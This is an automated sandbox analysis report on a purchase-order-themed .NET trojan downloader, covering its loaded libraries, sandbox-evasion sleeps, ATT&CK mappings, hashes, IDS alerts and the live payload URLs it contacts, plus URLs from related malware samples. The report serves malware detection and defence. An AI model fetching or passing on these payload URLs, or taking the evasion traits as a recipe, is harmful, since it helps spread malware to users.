Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: gpapi.dllJump to behavior
Source: PO1178236.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PO1178236.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: PO1178236.scr.exe, Program.cs.Net Code: Fjewgfg System.AppDomain.Load(byte[])
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeMemory allocated: 2410000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeMemory allocated: 45B0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeMemory allocated: 6190000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeMemory allocated: 5160000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeWindow / User API: threadDelayed 4904Jump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeWindow / User API: threadDelayed 4971Jump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exe TID: 7708Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exe TID: 7708Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exe TID: 7768Thread sleep count: 4904 > 30Jump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exe TID: 7760Thread sleep count: 4971 > 30Jump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeThread delayed: delay time: 100000Jump to behavior
Source: PO1178236.scr.exe, 00000000.00000002.3252036254.0000000000929000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\PO1178236.scr.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeQueries volume information: C:\Users\user\Desktop\PO1178236.scr.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
Virtualization/Sandbox Evasion
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Software Packing
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS12
System Information Discovery
Distributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PO1178236.scr.exe59%VirustotalBrowse
PO1178236.scr.exe66%ReversingLabsWin32.Trojan.Leonem
PO1178236.scr.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.vascocorretora.com.br0%Avira URL Cloudsafe
https://www.vascocorretora.com.brD0%Avira URL Cloudsafe
https://www.vascocorretora.com.br/PPI/Lhysknp0%Avira URL Cloudsafe
https://www.vascocorretora.com.br/PPI/Lhysknv.dat0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.vascocorretora.com.br
188.114.96.3
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://www.vascocorretora.com.br/PPI/Lhysknv.datfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://www.vascocorretora.com.brDPO1178236.scr.exe, 00000000.00000002.3252624869.0000000003020000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006422000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006400000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006460000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.00000000063F4000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://www.vascocorretora.com.brPO1178236.scr.exe, 00000000.00000002.3252624869.00000000025B1000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO1178236.scr.exe, 00000000.00000002.3252624869.00000000025B1000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://www.cloudflare.com/5xx-error-landingPO1178236.scr.exe, 00000000.00000002.3252624869.0000000003020000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.00000000064B6000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006422000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006400000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006460000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006325000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006191000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000003060000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006236000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.00000000063F4000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://www.vascocorretora.com.br/PPI/LhysknpPO1178236.scr.exe, 00000000.00000002.3252624869.0000000003020000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        188.114.96.3
        www.vascocorretora.com.brEuropean Union
        13335CLOUDFLARENETUSfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1586497
        Start date and time:2025-01-09 08:34:56 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 38s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:PO1178236.scr.exe
        Detection:MAL
        Classification:mal60.evad.winEXE@1/0@1/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 9
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
        • Excluded IPs from analysis (whitelisted): 4.175.87.197
        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target PO1178236.scr.exe, PID 7668 because it is empty
        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtDeviceIoControlFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        188.114.96.3KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
        • www.mydreamdeal.click/1ag2/?xP7x=4VB/N4F6tibqC9FQILosJ+n1llTK4MiF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxa/r9DhwgcU3z86+N04yu78wK1Du9wX32CCg=&F4=Q0yHy
        GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
        • /api/get/dll
        Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
        QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
        • filetransfer.io/data-package/u7ghXEYp/download
        CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
        • www.mffnow.info/1a34/
        A2028041200SD.exeGet hashmaliciousFormBookBrowse
        • www.mydreamdeal.click/1ag2/
        SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
        • www.questmatch.pro/ipd6/
        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
        • filetransfer.io/data-package/I7fmQg9d/download
        need quotations.exeGet hashmaliciousFormBookBrowse
        • www.rtpwslot888gol.sbs/jmkz/
        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
        • filetransfer.io/data-package/Bh1Kj4RD/download
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUSSubscription_Renewal_Invoice_2025_FGHDCS.htmlGet hashmaliciousHTMLPhisherBrowse
        • 188.114.96.3
        DPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
        • 104.21.112.1
        https://qr.me-qr.com/PVhBu5SRGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        http://join.grass-io.ccGet hashmaliciousUnknownBrowse
        • 104.18.18.237
        https://qr.me-qr.com/pt/E9k76ewGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        watchdog.elfGet hashmaliciousXmrigBrowse
        • 1.1.1.1
        https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        https://rinderynitvye.blogspot.com/Get hashmaliciousCAPTCHA Scam ClickFix, PhisherBrowse
        • 188.114.97.3
        https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        3b5074b1b5d032e5620f69f9f700ff0ePurchase Order A2409002.scr.exeGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        Ref#103052.exeGet hashmaliciousXWormBrowse
        • 188.114.96.3
        NEW PURCHASE INQUIRY.scr.exeGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        https://redduppgh.com/Get hashmaliciousUnknownBrowse
        • 188.114.96.3
        https://minia.n1tab.com/Get hashmaliciousUnknownBrowse
        • 188.114.96.3
        http://topmarktingplace.com/4vfVEJ42616owhy1324yhmrkkdpck110EVYGTFUNAFUPGFT22589MFQQ17548D10Get hashmaliciousUnknownBrowse
        • 188.114.96.3
        http://topmarktingplace.com/4KCrhO42616HeLs1324axlafysauc110UGQLALGLNEZCHJM22589XDWY17548d10Get hashmaliciousUnknownBrowse
        • 188.114.96.3
        PO.exeGet hashmaliciousMassLogger RATBrowse
        • 188.114.96.3
        ZipThis.exeGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        No context
        No created / dropped files found
        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
        Entropy (8bit):4.825274372889422
        TrID:
        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        • Win32 Executable (generic) a (10002005/4) 49.78%
        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
        • Generic Win/DOS Executable (2004/3) 0.01%
        • DOS Executable Generic (2002/1) 0.01%
        File name:PO1178236.scr.exe
        File size:12'800 bytes
        MD5:d165a97582770739cc7b847e1b5dbeef
        SHA1:fa06c1014fa0810e3ea2cbc661e9bb443461ad9e
        SHA256:bf6aabd3c8fc42049fc6435f2432c97a8e8aa3258e0591b3756d5d84df2b3e6c
        SHA512:2e4f226bf38340ea356c6003549bccfca562247375475b82e92ba97d9f7969fc795e2a3134dbcb0aecec2bc3df48785552995ce4714aff627fc101caa379f9dc
        SSDEEP:192:aQx1U46h8FHN3t4Ag/MkpAfQZz/IJ5ev:/y8FHNmZMkpAIZz/ILe
        TLSH:ED42F804A7568732D6E84BF29EC3C2643370F7057A87AB0F37C2290F7D65316692679A
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gf.....................".......-... ...@....@.. ....................................`................................
        Icon Hash:70cccc8692968ec8
        Entrypoint:0x402db2
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Time Stamp:0x6667C180 [Tue Jun 11 03:16:16 2024 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
        Instruction
        jmp dword ptr [00402DC0h]
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        xchg eax, esp
        sub eax, 00000000h
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x2d640x4c.text
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x1eba.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x2dc00x8.text
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x20000xdc80xe00caab0ad57057fb9b6acb131f511d1581False0.5831473214285714data5.441551682844076IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rsrc0x40000x1eba0x2000436c151efd6df54d7d2977309f751802False0.3961181640625data4.621716604119004IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc0x60000xc0x200cc3e720024df4307c896442516776270False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_ICON0x41000x1870Device independent bitmap graphic, 35 x 84 x 32, image size 58800.4040920716112532
        RT_GROUP_ICON0x59800x14data1.1
        RT_VERSION0x59a40x31cdata0.4321608040201005
        RT_MANIFEST0x5cd00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
        DLLImport
        mscoree.dll_CorExeMain
        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
        2025-01-09T08:35:56.402544+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949708188.114.96.3443TCP
        2025-01-09T08:35:57.012166+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949709188.114.96.3443TCP
        2025-01-09T08:35:57.596209+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949710188.114.96.3443TCP
        2025-01-09T08:35:58.229793+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949711188.114.96.3443TCP
        2025-01-09T08:35:58.845565+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949712188.114.96.3443TCP
        2025-01-09T08:35:59.463272+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949713188.114.96.3443TCP
        2025-01-09T08:36:00.151118+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949714188.114.96.3443TCP
        2025-01-09T08:36:01.054076+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949715188.114.96.3443TCP
        2025-01-09T08:36:01.675491+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949716188.114.96.3443TCP
        2025-01-09T08:36:02.304812+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949717188.114.96.3443TCP
